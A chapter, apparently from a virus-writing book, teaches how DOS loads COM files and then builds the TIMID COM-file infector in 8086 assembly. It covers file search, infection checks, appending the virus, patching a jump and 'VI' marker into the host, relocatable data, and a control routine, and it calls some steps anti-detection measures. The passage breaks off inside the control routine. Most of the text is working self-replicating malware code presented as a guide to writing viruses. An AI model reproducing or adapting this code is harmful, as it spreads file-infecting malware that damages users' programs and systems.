A Simple COM File Infector

we will discuss one of the simplest of all computer viruses. This virus is very small, comprising only 264 bytes of machine language instructions. It is also fairly safe, because it has one of the simplest search routines possible. This virus, which we will call TIMID, is designed to only infect COM files which are in the currently logged directory on the computer. It does not jump across directories or drives, if you don’t call it from another directory, so it can be easily contained. It is also harmless because it contains no destructive code, and it tells you when it is infecting a new file, so you will know where it is and where it has gone. On the other hand, its extreme simplicity means that this is not a very effective virus. It will not infect most files, and it can easily be caught. Still, this virus will introduce all the essential concepts necessary to write a virus, with a minimum of complexity and a minimal risk to the experimenter. As such, it is an excellent instructional tool.

Some DOS Basics

To understand the means by which the virus copies itself from one program to another, we have to dig into the details of how the operating system, DOS, loads a program into memory and passes control to it. The virus must be designed so it’s code gets executed, rather than just the program it has attached itself to. Only then can it reproduce. Then, it must be able to pass control back to the host program, so the host can execute in its entirety as well.

When one enters the name of a program at the DOS prompt, DOS begins looking for files with that name and an extent of “COM”. If it finds one it will load the file into memory and execute it. Otherwise DOS will look for files with the same name and an extent of “EXE” to load and execute. If no EXE file is found, the operating system will finally look for a file with the extent “BAT” to execute. Failing all three of these possibilities, DOS will display the error message “Bad command or file name.”

EXE and COM files are directly executable by the Central Processing Unit. Of these two types of program files, COM files are much simpler. They have a predefined segment format which is built into the structure of DOS, while EXE files are designed to handle a user defined segment format, typical of very large and complicated programs. The COM file is a direct binary image of what should be put into memory and executed by the CPU, but an EXE file is not.

To execute a COM file, DOS must do some preparatory work before giving that program control. Most importantly, DOS controls and allocates memory usage in the computer. So first it checks to see if there is enough room in memory to load the program. If it can, DOS then allocates the memory required for the program. This step is little more than an internal housekeeping function. DOS simply records how much space it is making available for such and such a program, so it won’t try to load another program on top of it later, or give memory space to the program that would conflict with another program. Such a step is necessary because more than one program may reside in memory at any given time. For example, pop-up, memory resident programs can remain in memory, and parent programs can load child programs into memory, which execute and then return control to the parent.

Next, DOS builds a block of memory 256 bytes long known as the Program Segment Prefix, or PSP. The PSP is a remnant of an older operating system known as CP/M. CP/M was popular in the late seventies and early eighties as an operating system for microcomputers based on the 8080 and Z80 microprocOffset Size Description

Int 20H Instruction

Address of Last allocated segment

Reserved, should be zero

Far call to DOS function dispatcher

Int 22H vector (Terminate program)

Int 23H vector (Ctrl-C handler)

Int 24H vector (Critical error handler)

Reserved

Segment of DOS environment

Reserved

Int 21H / RETF instruction

Reserved

File Control Block 1

File Control Block 2

Default DTA (command line at startup)

Beginning of COM program

0 H 2

2 2 4 1

5 5

A 4

E 4

12 4

16 22

2C 2

2E 34

50 3 53 9

5C 16

6C 20

80 128

100 -

Figure 2: Format of the Program S egment Prefix.

essors. In the CP/M world, 64 kilobytes was all the memory a computer had. The lowest 256 bytes of that memory was reserved for the operating system itself to store crucial data. For example, location 5 in memory contained a jump instruction to get to the rest of the operating system, which was stored in high memory, and its location differed according to how much memory the computer had. Thus, programs written for these machines would access the operating system functions by calling location 5 in memory. When PC-DOS came along, it imitated CP/M because CP/M was very popular, and many programs had been written to work with it. So the PSP (and whole COM file concept) became a part of DOS. The result is that a lot of the information stored in the PSP is of little use to a DOS programmer today. Some of it is useful though, as we will see a little later.

Once the PSP is built, DOS takes the COM file stored on disk and loads it into memory just above the PSP, starting at offset 100H. Once this is done, DOS is almost ready to pass control to the program. Before it does, though, it must set up the registers in the CPU to certain predetermined values. First, the segment registers must be set properly, or a COM program cannot run. Let’s take a look at the how’s and why’s of these segment registers.

In the 8088 microprocessor, all registers are 16 bit registers. The problem is that a 16 bit register will only allow one to address 64 kilobytes of memory. If you want to use more memory, you need more bits to address it. The 8088 can address up to one megabyte of memory using a process known as segmentation. It uses two registers to create a physical memory address that is 20 bits long instead of just 16. Such a register pair consists of a segment register, which contains the most significant bits of the address, and an offset register, which contains the least significant bits. The segment register points to a 16 byte block of memory, and the offset register tells how many bytes to add to the start of the 16 byte block to locate the desired byte in memory. For example, if the ds register is set to 1275 Hex and the bx register is set to 457 Hex, then the physical 20 bit address of the byte ds:[bx] is

1275H x 10H = 12750H

+ 457H

12BA7H

No offset should ever have to be larger than 15, but one normally uses values up to the full 64 kilobyte range of the offset register. This leads to the possibility of writing a single physical address in several different ways. For example, setting ds = 12BA Hex and bx = 7 would produce the same physical address 12BA7 Hex as in the example above. The proper choice is simply whatever is convenient for the programmer. However, it is standard programming practice to set the segment registers and leave them alone as much as possible, using offsets to range through as much data and code as one can (64 kilobytes if necessary).

The 8088 has four segment registers, cs, ds, ss and es, which stand for Code Segment, Data Segment, Stack Segment, and Extra Segment, respectively. They each serve different purposes. The cs register specifies the 64K segment where the actual program instructions which are executed by the CPU are located. The Data Segment is used to specify a segment to put the program’s data in, and the Stack Segment specifies where the program’s stack is located. The es register is available as an extra segment register for the programmer’s use. It might typically be used to point to the video memory segment, for writing data directly to video, etc.

COM files are designed to operate with a very simple, but limited segment structure. namely they have one segment, cs=ds=es=ss. All data is stored in the same segment as the program code itself, and the stack shares this segment. Since any given segment is 64 kilobytes long, a COM program can use at most 64 kilobytes for all of its code, data and stack. When PC’s were first introduced, everybody was used to writing programs limited to 64 kilobytes, and that seemed like a lot of memory. However, today it is not uncommon to find programs that require several hundred kilobytes of code, and maybe as much data. Such programs must use a more complex segmentation scheme than the COM file format allows. The EXE file structure is designed to handle that complexity. The drawback with the EXE file is that the program code which is stored on disk must be modified significantly before it can be executed by the CPU. DOS does that at load time, and it is completely transparent to the user, but a virus that attaches to EXE files must not upset DOS during this modification process, or it won’t work. A COM program doesn’t require this modification process because it uses only one segment for everything. This makes it possible to store a straight binary image of the code to be executed on disk (the COM file). When it is time to run the program, DOS only needs to set up the segment registers properly and execute it.

The PSP is set up at the beginning of the segment allocated for the COM file, i.e. at offset 0. DOS picks the segment based on what free memory is available, and puts the PSP at the very start of that segment. The COM file itself is loaded at offset 100 Hex, just after the PSP. Once everything is ready, DOS transfers control to

Figure 3: Memory map just before executing a C OM file.

the beginning of the program by jumping to the offset 100 Hex in the code segment where the program was loaded. From there on, the program runs, and it accesses DOS occasionally, as it sees fit, to perform various I/O functions, like reading and writing to disk. When the program is done, it transfers control back to DOS, and DOS releases the memory reserved for that program and gives the user another command line prompt.

An Outline for a Virus

In order for a virus to reside in a COM file, it must get control passed to its code at some point during the execution of the program. It is conceivable that a virus could examine a COM file and determine how it might wrest control from the program at any point during its execution. Such an analysis would be very difficult, though, for the general case, and the resulting virus would be anything but simple. By far the easiest point to take control is right at the very beginning, when DOS jumps to the start of the program.

At this time, the virus is completely free to use any space above the image of the COM file which was loaded into memory by DOS. Since the program itself has not yet executed, it cannot have set up data anywhere in memory, or moved the stack, so this is a very safe time for the virus to operate. At this stage, it isn’t too difficult a task to make sure that the virus will not interfere with the host program to damage it or render it inoperative. Once the host program begins to execute, almost anything can happen, though, and the virus’s job becomes much more difficult.

To gain control at startup time, a virus infecting a COM file must replace the first few bytes in the COM file with a jump to the virus code, which can be appended at the end of the COM file. Then, when the COM file is executed, it jumps to the virus, which goes about looking for more files to infect, and infecting them. When the virus is ready, it can return control to the host program. The problem in doing this is that the virus already replaced the first few bytes of the host program with its own code. Thus it must restore those bytes, and then jump back to offset 100 Hex, where the original program begins.

Here, then, is the basic plan for a simple viral infection of a COM file. Imagine a virus sitting in memory, which has just been

Figure 4: Replacing the first bytes in a COM file.

activated. It goes out and infects another COM file with itself. Step by step, it might work like this:

An infected COM file is loaded into memory andexecuted. The viral code gets control first.
The virus in memory searches the disk to find asuitable COM file to infect.
If a suitable file is found, the virus appends its owncode to the end of the file.
Next, it reads the first few bytes of the file intomemory, and writes them back out to the file in a special data area within the virus’ code. The new virus will need these bytes when it executes.
Next the virus in memory writes a jump instruction tothe beginning of the file it is infecting, which will pass control to the new virus when its host program is

executed.

Then the virus in memory takes the bytes which wereoriginally the first bytes in its host, and puts them back (at offset 100H).
Finally, the viral code jumps to offset 100 Hex andallows its host program to execute.

Ok. So let’s develop a real virus with these specifications. We will need both a search mechanism and a copy mechanism.

The Search Mechanism

To understand how a virus searches for new files to infect on an IBM PC style computer operating under MS-DOS or PCDOS, it is important to understand how DOS stores files and information about them. All of the information about every file on disk is stored in two areas on disk, known as the directory and the File Allocation Table, or FAT for short. The directory contains a 32 byte file descriptor record for each file. This descriptor record contains the file’s name and extent, its size, date and time of creation, and the file attribute, which contains essential information The Directory Entry

0 Byte 0FH

File Name				A t t r	Reserved
Reserved	Time	Date	First C luster		File S ize

Reserved

8 Bit 0

Figure 5: The directory entry record format.

for the operating system about how to handle the file. The FAT is a map of the entire disk, which simply informs the operating system which areas are occupied by which files.

Each disk has two FAT’s, which are identical copies of each other. The second is a backup, in case the first gets corrupted. On the other hand, a disk may have many directories. One directory, known as the root directory, is present on every disk, but the root may have multiple subdirectories, nested one inside of another to form a tree structure. These subdirectories can be created, used, and removed by the user at will. Thus, the tree structure can be as simple or as complex as the user has made it.

Both the FAT and the root directory are located in a fixed area of the disk, reserved especially for them. Subdirectories are stored just like other files with the file attribute set to indicate that this file is a directory. The operating system then handles this subdirectory file in a completely different manner than other files to make it look like a directory, and not just another file. The subdirectory file simply consists of a sequence of 32 byte records describing the files in that directory. It may contain a 32 byte record with the attribute set to directory, which means that this file is a subdirectory of a subdirectory.

The DOS operating system normally controls all access to files and subdirectories. If one wants to read or write to a file, he does not write a program that locates the correct directory on the disk, reads the file descriptor records to find the right one, figure out where the file is and read it. Instead of doing all of this work, he simply gives DOS the directory and name of the file and asks it to open the file. DOS does all the grunt work. This saves a lot of time in writing and debugging programs. One simply does not have to deal with the intricate details of managing files and interfacing with the hardware.

DOS is told what to do using interrupt service routines (ISR’s). Interrupt 21H is the main DOS interrupt service routine that we will use. To call an ISR, one simply sets up the required CPU registers with whatever values the ISR needs to know what to do, and calls the interrupt. For example, the code

mov ds,SEG FNAME ;ds:dx points to filename mov dx,OFFSET FNAME xor al,al ;al=0 mov ah,3DH ;DOS function 3D int 21H ;go do it

opens a file whose name is stored in the memory location FNAME in preparation for reading it into memory. This function tells DOS to locate the file and prepare it for reading. The “int 21H” instruction transfers control to DOS and lets it do its job. When DOS is finished opening the file, control returns to the statement immediately after the “int 21H”. The register ah contains the function number, which DOS uses to determine what you are asking it to do. The other registers must be set up differently, depending on what ah is, to convey more information to DOS about what it is supposed to do. In the above example, the ds:dx register pair is used to point to the memory location where the name of the file to open is stored. The register al tells DOS to open the file for reading only.

All of the various DOS functions, including how to set up all the registers, are detailed in many books on the subject. Peter Norton’s Programmer’s Guide to the IBM PC is one of the better ones, so if you don’t have that information readily available, I suggest you get a copy. Here we will only discuss the DOS functions we need, as we need them. This will probably be enough to get by. However, if you are going to write viruses of your own, it is definitely worthwhile knowing about all of the various functions you can use, as well as the finer details of how they work and what to watch out for.

To write a routine which searches for other files to infect, we will use the DOS search functions. The people who wrote DOS knew that many programs (not just viruses) require the ability to look for files and operate on them if any of the required type are found. Thus, they incorporated a pair of searching functions into the interrupt 21H handler, called Search First and Search Next. These are some of the more complicated DOS functions, so they require the user to do a fair amount of preparatory work before he calls them. The first step is to set up an ASCIIZ string in memory to specify the directory to search, and what files to search for. This is simply an array of bytes terminated by a null byte (0). DOS can search and report on either all the files in a directory or a subset of files which the user can specify by file attribute and by specifying a file name using the wildcard characters “?” and “*”, which you should be familiar with from executing commands like copy *.* a: and dir a???_100.* from the command line in DOS. (If not, a basic book on DOS will explain this syntax.) For example, the ASCIIZ string

DB ’\system\hyper.*’,0

will set up the search function to search for all files with the name hyper, and any possible extent, in the subdirectory named system. DOS might find files like hyper.c, hyper.prn, hyper.exe, etc.

After setting up this ASCIIZ string, one must set the registers ds and dx up to the segment and offset of this ASCIIZ string in memory. Register cl must be set to a file attribute mask which will tell DOS which file attributes to allow in the search, and which to exclude. The logic behind this attribute mask is somewhat complex, so you might want to study it in detail in Appendix G. Finally, to call the Search First function, one must set ah = 4E Hex.

If the search first function is successful, it returns with register al = 0, and it formats 43 bytes of data in the Disk Transfer Area, or DTA. This data provides the program doing the search with the name of the file which DOS just found, its attribute, its size and its date of creation. Some of the data reported in the DTA is also used by DOS for performing the Search Next function. If the search cannot find a matching file, DOS returns al non-zero, with no data in the DTA. Since the calling program knows the address of the DTA, it can go examine that area for the file information after DOS has stored it there.

To see how this function works more clearly, let us consider an example. Suppose we want to find all the files in the currently logged directory with an extent “COM”, including hidden and system files. The assembly language code to do the Search First would look like this (assuming ds is already set up correctly):

SRCH_FIRST: mov dx,OFFSET COMFILE;set offset of asciiz string mov cl,00000110B ;set hidden and system attributes mov ah,4EH ;search first function int 21H ;call DOS or al,al ;check to see if successful jnz NOFILE ;go handle no file found condition FOUND: ;come here if file found

COMFILE DB ’*.COM’,0

If this routine executed successfully, the DTA might look like this:

03 3F 3F 3F 3F 3F 3F 3F-3F 43 4F 4D 06 18 00 00 .????????COM....

00 00 00 00 00 00 16 98-30 13 BC 62 00 00 43 4F ........0..b..CO 4D 4D 41 4E 44 2E 43 4F-4D 00 00 00 00 00 00 00 MMAND.COM.......

when the program reaches the label FOUND. In this case the search found the file COMMAND.COM.

In comparison with the Search First function, the Search Next is easy, because all of the data has already been set up by the Search First. Just set ah = 4F hex and call DOS interrupt 21H:

mov ah,4FH ;search next function int 21H ;call DOS or al,al ;see if a file was found jnz NOFILE ;no, go handle no file found FOUND2: ;else process the file

If another file is found the data in the DTA will be updated with the new file name, and ah will be set to zero on return. If no more matches are found, DOS will set ah to something besides zero on return. One must be careful here so the data in the DTA is not altered between the call to Search First and later calls to Search Next, because the Search Next expects the data from the last search call to be there.

Of course, the computer virus does not need to search through all of the COM files in a directory. It must find one that will be suitable to infect, and then infect it. Let us imagine a procedure FILE_OK. Given the name of a file on disk, it will determine whether that file is good to infect or not. If it is infectable, FILE_OK will return with the zero flag, z, set, otherwise it will return with the zero flag reset. We can use this flag to determine whether to continue searching for other files, or whether we should go infect the one we have found.

If our search mechanism as a whole also uses the z flag to tell the main controlling program that it has found a file to infect (z=file found, nz=no file found) then our completed search function can be written like this:

FIND_FILE: mov dx,OFFSET COMFILE mov al,00000110B mov ah,4EH ;perform search first int 21H FF_LOOP:

or al,al ;any possibilities found? jnz FF_DONE ;no - exit with z reset call FILE_OK ;yes, go check if we can infect it jz FF_DONE ;yes - exit with z set mov ah,4FH ;no - search for another file int 21H

jmp FF_LOOP ;go back up and see what happened FF_DONE: ret ;return to main virus control routine

Figure 6: Logic of the file search routine.

Study this search routine carefully. It is important to understand if you want to write computer viruses, and more generally, it is useful in a wide variety of programs of all kinds.

Of course, for our virus to work correctly, we have to write the FILE_OK function which determines whether a file should be infected or left alone. This function is particularly important to the success or failure of the virus, because it tells the virus when and where to move. If it tells the virus to infect a program which does not have room for the virus, then the newly infected program may be inadvertently ruined. Or if FILE_OK cannot tell whether a program has already been infected, it will tell the virus to go ahead and infect the same file again and again and again. Then the file will grow larger and larger, until there is no more room for an infection. For example, the routine

FILE_OK: xor al,al ret

simply sets the z flag and returns. If our search routine used this subroutine, it would always stop and say that the first COM file it found was the one to infect. The result would be that the first COM program in a directory would be the only program that would ever get infected. It would just keep getting infected again and again, and growing in size, until it exceeded its size limit and crashed. So although the above example of FILE_OK might enable the virus to infect at least one file, it would not work well enough for the virus to be able to start jumping from file to file.

A good FILE_OK routine must perform two checks: (1) it must check a file to see if it is too long to attach the virus to, and (2) it must check to see if the virus is already there. If the file is short enough, and the virus is not present, FILE_OK should return a “go ahead” to the search routine.

On entry to FILE_OK, the search function has set up the DTA with 43 bytes of information about the file to check, including its size and its name. Suppose that we have defined two labels, FSIZE and FNAME in the DTA to access the file size and file name respectively. Then checking the file size to see if the virus will fit is a simple matter. Since the file size of a COM file is always less than 64 kilobytes, we may load the size of the file we want to infect into the ax register: mov ax,WORD PTR [FSIZE]

Next we add the number of bytes the virus will have to add to this file, plus 100H. The 100H is needed because DOS will also allocate room for the PSP, and load the program file at offset 100H. To determine the number of bytes the virus will need automatically, we simply put a label VIRUS at the start of the virus code we are writing and a label END_VIRUS at the end of it, and take the difference. If we add these bytes to ax, and ax overflows, then the file which the search routine has found is too large to permit a successful infection. An overflow will cause the carry flag c to be set, so the file size check will look something like this:

FILE_OK: mov ax,WORD PTR [FSIZE] add ax,OFFSET END_VIRUS - OFFSET VIRUS + 100H jc BAD_FILE

. GOOD_FILE: xor al,al ret BAD_FILE:

mov al,1 or al,al ret

This routine will suffice to prevent the virus from infecting any file that is too large.

The next problem that the FILE_OK routine must deal with is how to avoid infecting a file that has already been infected. This can only be accomplished if the virus has some understanding of how it goes about infecting a file. In the TIMID virus, we have decided to replace the first few bytes of the host program with a jump to the viral code. Thus, the FILE_OK procedure can go out and read the file which is a candidate for infection to determine whether its first instruction is a jump. If it isn’t, then the virus obviously has not infected that file yet. There are two kinds of jump instructions which might be encountered in a COM file, known as a near jump and a short jump. The virus we create here will always use a near jump to gain control when the program starts. Since a short jump only has a range of 128 bytes, we could not use it to infect a COM file larger than 128 bytes. The near jump allows a range of 64 kilobytes. Thus it can always be used to jump from the beginning of a COM file to the virus, at the end of the program, no matter how big the COM file is (as long as it is really a valid COM file). A near jump is represented in machine language with the byte E9 Hex, followed by two bytes which tell the CPU how far to jump. Thus, our first test to see if infection has already occurred is to check to see if the first byte in the file is E9 Hex. If it is anything else, the virus is clear to go ahead and infect.

Looking for E9 Hex is not enough though. Many COM files are designed so the first instruction is a jump to begin with. Thus the virus may encounter files which start with an E9 Hex even though they have never been infected. The virus cannot assume that a file has been infected just because it starts with an E9. It must go farther. It must have a way of telling whether a file has been infected even when it does start with E9. If we do not incorporate this extra step into the FILE_OK routine, the virus will pass by many good COM files which it could infect because it thinks they have already been infected. While failure to incorporate such a feature into FILE_OK will not cause the virus to fail, it will limit its functionality.

One way to make this test simple and yet very reliable is to change a couple more bytes than necessary at the beginning of the host program. The near jump will require three bytes, so we might take two more, and encode them in a unique way so the virus can be pretty sure the file is infected if those bytes are properly encoded. The simplest scheme is to just set them to some fixed value. We’ll use the two characters “VI” here. Thus, when a file begins with a near jump followed by the bytes “V”=56H and “I”=49H, we can be almost positive that the virus is there, and otherwise it is not. Granted, once in a great while the virus will discover a COM file which is set up with a jump followed by “VI” even though it hasn’t been infected. The chances of this occurring are so small, though, that it will be no great loss if the virus fails to infect this rare one file in a million. It will infect everything else.

To read the first five bytes of the file, we open it with DOS Interrupt 21H function 3D Hex. This function requires us to set ds:dx to point to the file name (FNAME) and to specify the access rights which we desire in the al register. In the FILE_OK routine the virus only needs to read the file. Yet there we will try to open it with read/write access, rather than read-only access. If the file attribute is set to read-only, an attempt to open in read/write mode will result in an error (which DOS signals by setting the carry flag on return from INT 21H). This will allow the virus to detect read-only files and avoid them, since the virus must write to a file to infect it. It is much better to find out that the file is read-only here, in the search routine, than to assume the file is good to infect and then have the virus fail when it actually attempts infection. Thus, when opening the file, we set al = 2 to tell DOS to open it in read/write mode. If DOS opens the file successfully, it returns a file handle in ax. This is just a number which DOS uses to refer to the file in all future requests. The code to open the file looks like this:

mov ax,3D02H mov dx,OFFSET FNAME int 21H jc BAD_FILE

Figure 7: The file handle and file pointer.

Once the file is open, the virus may perform the actual read operation, DOS function 3F Hex. To read a file, one must set bx equal to the file handle number and cx to the number of bytes to read from the file. Also ds:dx must be set to the location in memory where the data read from the file should be stored (which we will call START_IMAGE). DOS stores an internal file pointer for each open file which keeps track of where in the file DOS is going to do its reading and writing from. The file pointer is just a four byte long integer, which specifies which byte in the selected file a read or write operation refers to. This file pointer starts out pointing to the first byte in the file (file pointer = 0), and it is automatically advanced by DOS as the file is read from or written to. Since it starts at the beginning of the file, and the FILE_OK procedure must read the first five bytes of the file, there is no need to touch the file pointer right now. However, you should be aware that it is there, hidden away by DOS. It is an essential part of any file reading and writing we may want to do. When it comes time for the virus to infect the file, it will have to modify this file pointer to grab a few bytes here and put them there, etc. Doing that is much faster (and hence, less noticeable) than reading a whole file into memory, manipulating it in memory, and then writing it back to disk. For now, though, the actual reading of the file is fairly simple. It looks like this:

mov bx,ax ;put handle in bx mov cx,5 ;prepare to read 5 bytes mov dx,OFFSET START_IMAGE ;to START_IMAGE mov ah,3FH

int 21H ;go do it

We will not worry about the possibility of an error in reading five bytes here. The only possible error is that the file is not long enough to read five bytes, and we are pretty safe in assuming that most COM files will have more than four bytes in them.

Finally, to close the file, we use DOS function 3E Hex and put the file handle in bx. Putting it all together, the FILE_OK procedure looks like this:

FILE_OK:

mov dx,OFFSET FNAME ;first open the file mov ax,3D02H ;r/w access open file int 21H jc FOK_NZEND ;error opening file - file can’t be used

mov bx,ax ;put file handle in bx push bx ;and save it on the stack mov cx,5 ;read 5 bytes at the start of the program mov dx,OFFSET START_IMAGE ;and store them here mov ah,3FH ;DOS read function int 21H

pop bx ;restore the file handle mov ah,3EH int 21H ;and close the file

mov ax,WORD PTR [FSIZE] ;get the file size of the host add ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add size of virus to it jc FOK_NZEND ;c set if ax overflows (size > 64k) cmp BYTE PTR [START_IMAGE],0E9H ;size ok-is first byte a near jmp? jnz FOK_ZEND ;not near jmp, file must be ok, exit with z cmp WORD PTR [START_IMAGE+3],4956H ;ok, is ’VI’ in positions 3 & 4? jnz FOK_ZEND ;no, file can be infected, return with Z set FOK_NZEND: mov al,1 ;we’d better not infect this file or al,al ;so return with z reset ret FOK_ZEND: xor al,al ;ok to infect, return with z set ret

This completes our discussion of the search mechanism for the virus.

The Copy Mechanism

After the virus finds a file to infect, it must carry out the infection process. We have already briefly discussed how that is to be accomplished, but now let’s write the code that will actually do it. We’ll put all of this code into a routine called INFECT.

The code for INFECT is quite straightforward. First the virus opens the file whose name is stored at FNAME in read/write mode, just as it did when searching for a file, and it stores the file handle in a data area called HANDLE. This time, however we want to go to the end of the file and store the virus there. To do so, we first move the file pointer using DOS function 42H. In calling function 42H, the register bx must be set up with the file handle number, and cx:dx must contain a 32 bit long integer telling where to move the file pointer to. There are three different ways this function can be used, as specified by the contents of the al register. If al=0, the file pointer is set relative to the beginning of the file. If al=1, it is incremented relative to the current location, and if al=2, cx:dx is used as the offset from the end of the file. Since the first thing the virus must do is place its code at the end of the COM file it is attacking, it sets the file pointer to the end of the file. This is easy. Set cx:dx=0, al=2 and call function 42H:

xor cx,cx mov dx,cx mov bx,WORD PTR [HANDLE] mov ax,4202H int 21H

With the file pointer in the right location, the virus can now write itself out to disk at the end of this file. To do so, one simply uses the DOS write function, 40 Hex. To use function 40H one must set ds:dx to the location in memory where the data is stored that is going to be written to disk. In this case that is the start of the virus. Next, set cx to the number of bytes to write and bx to the file handle.

There is one problem here. Since the virus is going to be attaching itself to COM files of all different sizes, the address of the start of the virus code is not at some fixed location in memory. Every file it is attached to will put it somewhere else in memory. So the virus has to be smart enough to figure out where it is. To do this we will employ a trick in the main control routine, and store the offset of the viral code in a memory location named VIR_START. Here we assume that this memory location has already been properly initialized. Then the code to write the virus to the end of the file it is attacking will simply look like this:

mov cx,OFFSET FINAL - OFFSET VIRUS mov bx,WORD PTR [HANDLE] mov dx,WORD PTR [VIR_START] mov ah,40H int 21H

where VIRUS is a label identifying the start of the viral code and FINAL is a label identifying the end of the code. OFFSET FINAL - OFFSET VIRUS is independent of the location of the virus in memory.

Now, with the main body of viral code appended to the end of the COM file under attack, the virus must do some clean-up work. First, it must move the first five bytes of the COM file to a storage area in the viral code. Then it must put a jump instruction plus the code letters ’VI’ at the start of the COM file. Since we have already read the first five bytes of the COM file in the search routine, they are sitting ready and waiting for action at START_IMAGE. We need only write them out to disk in the proper location. Note that there must be two separate areas in the virus to store five bytes of startup code. The active virus must have the data area START_IMAGE to store data from files it wants to infect, but it must also have another area, which we’ll call START_CODE. This contains the first five bytes of the file it is actually attached to. Without START_CODE, the active virus will not be able to transfer control to the host program it is attached to when it is done executing.

To write the first five bytes of the file under attack, the virus must take the five bytes at START_IMAGE, and store them where START_CODE is located on disk. First, the virus sets the file pointer to the location of START_CODE on disk. To find that location, one must take the original file size (stored at FSIZE by

Figure 8: S TART_IMAGE and S TART_C ODE .

the search routine), and add OFFSET START_CODE - OFFSET VIRUS to it, moving the file pointer with respect to the beginning of the file:

xor cx,cx mov dx,WORD PTR [FSIZE] add dx,OFFSET START_CODE - OFFSET VIRUS mov bx,WORD PTR [HANDLE] mov ax,4200H int 21H

Next, the virus writes the five bytes at START_IMAGE out to the file:

mov cx,5 mov bx,WORD PTR [HANDLE] mov dx,OFFSET START_IMAGE mov ah,40H int 21H

The final step in infecting a file is to set up the first five bytes of the file with a jump to the beginning of the virus code, along with the identification letters “VI”. To do this, first position the file pointer to the beginning of the file:

xor cx,cx mov dx,cx mov bx,WORD PTR [HANDLE] mov ax,4200H int 21H

Next, we must set up a data area in memory with the correct information to write to the beginning of the file. START_IMAGE is a good place to set up these bytes since the data there is no longer needed for anything. The first byte should be a near jump instruction, E9 Hex: mov BYTE PTR [START_IMAGE],0E9H

The next two bytes should be a word to tell the CPU how many bytes to jump forward. This byte needs to be the original file size of the host program, plus the number of bytes in the virus which are before the start of the executable code (we will put some data there). We must also subtract 3 from this number because the relative jump is always referenced to the current instruction pointer, which will be pointing to 103H when the jump is actually executed. Thus, the two bytes telling the program where to jump are set up by

mov ax,WORD PTR [FSIZE] add ax,OFFSET VIRUS_START - OFFSET VIRUS -3 mov WORD PTR [START_IMAGE+1],ax

Finally set up the ID bytes ’VI’ in our five byte data area,

mov WORD PTR [START_IMAGE+3],4956H ;’VI’ write the data to the start of the file, using the DOS write function,

mov cx,5 mov dx,OFFSET START_IMAGE mov bx,WORD PTR [HANDLE] mov ah,40H int 21H

and then close the file using DOS,

mov ah,3EH mov bx,WORD PTR [HANDLE] int 21H

This completes the copy mechanism.

Data Storage for the Virus

One problem we must face in creating this virus is how to locate data. Since all jumps and calls in a COM file are relative, we needn’t do anything fancy to account for the fact that the virus must relocate itself as it copies itself from program to program. The jumps and calls relocate themselves automatically. Handling the data is not as easy. A data reference like

mov bx,WORD PTR [HANDLE]

Figure 9: Absolute data address catastrophe.

refers to an absolute offset in the program segment labeled HANDLE. We cannot just define a word in memory using an assembler directive like

HANDLE DW 0

and then assemble the virus and run it. If we do that, it will work right the first time. Once it has attached itself to a new program, though, all the memory addresses will have changed, and the virus will be in big trouble. It will either bomb out itself, or cause its host program to bomb.

There are two ways to avoid catastrophe here. Firstly, one could put all of the data together in one place, and write the program to dynamically determine where the data is and store that value in a register (e.g. si) to access it dynamically, like this: mov bx,[si+HANDLE_OFS]

where HANDLE_OFS is the offset of the variable HANDLE from the start of the data area.

Alternatively, we could put all of the data in a fixed location in the code segment, provided we’re sure that neither the virus nor the host will ever occupy that space. The only safe place to do this is at the very end of the segment, where the stack resides. Since the virus takes control of the CPU first when the COM file is executed, it will control the stack also. Thus we can determine exactly what the stack is doing, and stay out of its way. This is the method we choose.

When the virus first gains control, the stack pointer, sp, is set to FFFF Hex. If it calls a subroutine, the address directly after the call is placed on the stack, in the bytes FFFF Hex and FFFE Hex in the program’s segment, and the stack pointer is decremented by two, to FFFD Hex. When the CPU executes the return instruction in the subroutine, it uses the two bytes stored by the call to determine where to return to, and increments the stack pointer by two. Likewise, executing a push instruction decrements the stack by two bytes and stores the desired register at the location of the stack pointer. The pop instruction reverses this process. The int instruction requires five bytes of stack space, and this includes calls to hardware interrupt handlers, which may be accessed at any time in the program without warning, one on top of the other.

The data area for the virus can be located just below the memory required for the stack. The exact amount of stack space required is rather difficult to determine, but 80 bytes will be more than sufficient. The data will go right below these 80 bytes, and in this manner its location may be fixed. One must simply take account of the space it takes up when determining the maximum size of a COM file in the FILE_OK routine.

Of course, one cannot put initialized variables on the stack. They must be stored with the program on disk. To store them near the end of the program segment would require the virus to expand the file size of every file to near the 64K limit. Such a drastic change in file sizes would quickly tip the user off that his system has been infected! Instead, initialized variables should be stored with the executable virus code. This strategy will keep the number of bytes which must be added to the host to a minimum. (Thus it is a worthwhile anti-detection measure.) The drawback is that such variables must then be located dynamically by the virus at run time.

Fortunately, we have only one piece of data which must be pre-initialized, the string used by DOS in the search routine to locate COM files, which we called simply “COMFILE”. If you take a look back to the search routine, you’ll notice that we already took the relocatability of this piece of data into account when we retrieved it using the instructions

mov dx,WORD PTR [VIR_START] add dx,OFFSET COMFILE - OFFSET VIRUS instead of simply

mov dx,OFFSET COMFILE

The Master Control Routine

Now we have all the tools to write the TIMID virus. All that is necessary is a master control routine to pull everything together. This master routine must:

Dynamically determine the location (offset) of thevirus in memory.
Call the search routine to find a new program to infect.
Infect the program located by the search routine, if itfound one.
Return control to the host program.

To determine the location of the virus in memory, we use a simple trick. The first instruction in the master control routine will look like this:

VIRUS:

COMFILE DB ’*.COM’,0 VIRUS_START:

call GET_START GET_START: sub WORD PTR [VIR_START],OFFSET GET_START - OFFSET VIRUS

The call pushes the absolute address of GET_START onto the stack at FFFC Hex (since this is the first instruction of the virus, and the first instruction to use the stack). At that location, we overlay the stack with a word variable called VIR_START. We then subtract the difference in offsets between GET_START and the first byte of the virus, labeled VIRUS. This simple programming trick gets the absolute offset of the first byte of the virus in the program segment, and stores it in an easily accessible variable.

Next comes an important anti-detection step: The master control routine moves the Disk Transfer Area (DTA) to the data area for the virus using DOS function 1A Hex,

mov dx,OFFSET DTA mov ah,1AH int 21H

This move is necessary because the search routine will modify data in the DTA. When a COM file starts up, the DTA is set to a default value of an offset of 80 H in the program segment. The problem is that if the host program requires command line parameters, they are stored for the program at this same location. If the DTA were not changed temporarily while the virus was executing, the search routine would overwrite any command line parameters before the host program had a chance to access them. That would cause any infected COM program which required a command line parameter to bomb. The virus would execute just fine, and host programs that required no parameters would run fine, but the user could spot trouble with some programs. Temporarily moving the DTA eliminates this problem.

With the DTA moved, the main control routine can safely call the search and copy routines:

call FIND_FILE ;try to find a file to infect jnz EXIT_VIRUS ;jump if no file was found call INFECT ;else infect the file EXIT_VIRUS:

